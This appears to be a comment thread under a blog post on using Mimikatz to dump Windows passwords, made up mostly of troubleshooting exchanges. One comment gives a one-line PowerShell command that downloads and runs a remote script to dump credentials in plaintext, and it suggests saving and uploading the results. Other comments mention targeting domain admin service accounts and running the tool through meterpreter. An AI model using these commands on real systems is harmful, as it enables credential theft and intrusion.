Comments on Open Security Research: Using Mimikatz to Dump Passwords!

thanks, seems nice, no need to download mimikatz t...

2014-12-21T13:21:08.960-05:00

thanks, seems nice, no need to download mimikatz then, got it. but unfortunatly, i can not make the privilege::debug to the invoke option. any idea how to ?

Also any service accounts that have been configure...

2014-12-09T14:36:19.466-05:00

Also any service accounts that have been configured, so for instance on a server you might hit a nice domain admin account which is being used for backups... :D

Just type this into PowerShell as an administrator...

2014-01-17T22:07:47.048-05:00

Just type this into PowerShell as an administrator:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

This will give you the user password in plaintext in one command. Also, add this onto the end of the powershell script above:

>> C:\Output.txt

This will save the output to a file, making it even easier to collect your data. You can always change the path to make it easier to collect results, even upload to fpt etc!

I am trying this for the first time. At the final ...

2013-09-18T05:22:42.807-04:00

I am trying this for the first time. At the final stage I am getting

"Méthode 'getLogonPasswords' introuvable !

which translates as method 'getLogonPasswords' found

but no passwords are displayed.

Your help/thoughts would be appreciated.

Ger

This is "just" for logged in users ;) (o...

2012-08-19T14:58:02.937-04:00

This is "just" for logged in users ;) (or just logged in before)

I am a beginner but i need to ask one thing. It re...

2012-07-20T14:47:45.709-04:00

I am a beginner but i need to ask one thing.
It returns passwords of the logged in user, right?
I opened a session using meterpreter, got the shell and ran it, and got passwords of logged in user.
But what if i need passwords of other accounts as well? How do i do that, given user is logged in using his account only!

Thanks! Actually that was there in the original ve...

2012-07-06T17:21:48.623-04:00

Thanks! Actually that was there in the original version of this blog post but I somehow cut it out in transforming it from .txt to HTML. Fixed it above.. btw - great tool man!

it's just maybe because you don't unload s...

2012-07-06T16:35:33.895-04:00

it's just maybe because you don't unload sekurlsa.dll ( use "@"), or a proper "exit" in mimikatz (automatic unload...).

Thanks for posting your problem and your solution....

2012-07-03T17:05:52.295-04:00

Thanks for posting your problem and your solution. :) For others out there that may experience the same issue, the following commands should help you kill the hanging process remotely:

Kill by PID:
tasklist /S {IP.Ad.dr.ess} [/U domain\username]
taskkill /F /PID {PID} /S {IP.Ad.dr.ess} [/U domain\username]

Kill by image name:
taskkill /F /IM mimikatz.exe /S {IP.Ad.dr.ess} [/U domain\username]

I had to remotely kill the process. All is well.

2012-06-28T09:57:20.745-04:00

I had to remotely kill the process. All is well.

Tony, Thank you for the post. I was wondering i...

2012-06-28T09:39:58.956-04:00

Tony,

Thank you for the post. I was wondering if you have had any issues deleting the sekurlsa.dll file after injecting? I am testing this exact scenario and have successfully dumped the information but am unable to delete the injected .dll --- obviously because it is in use.

I am trying to figure out a work around...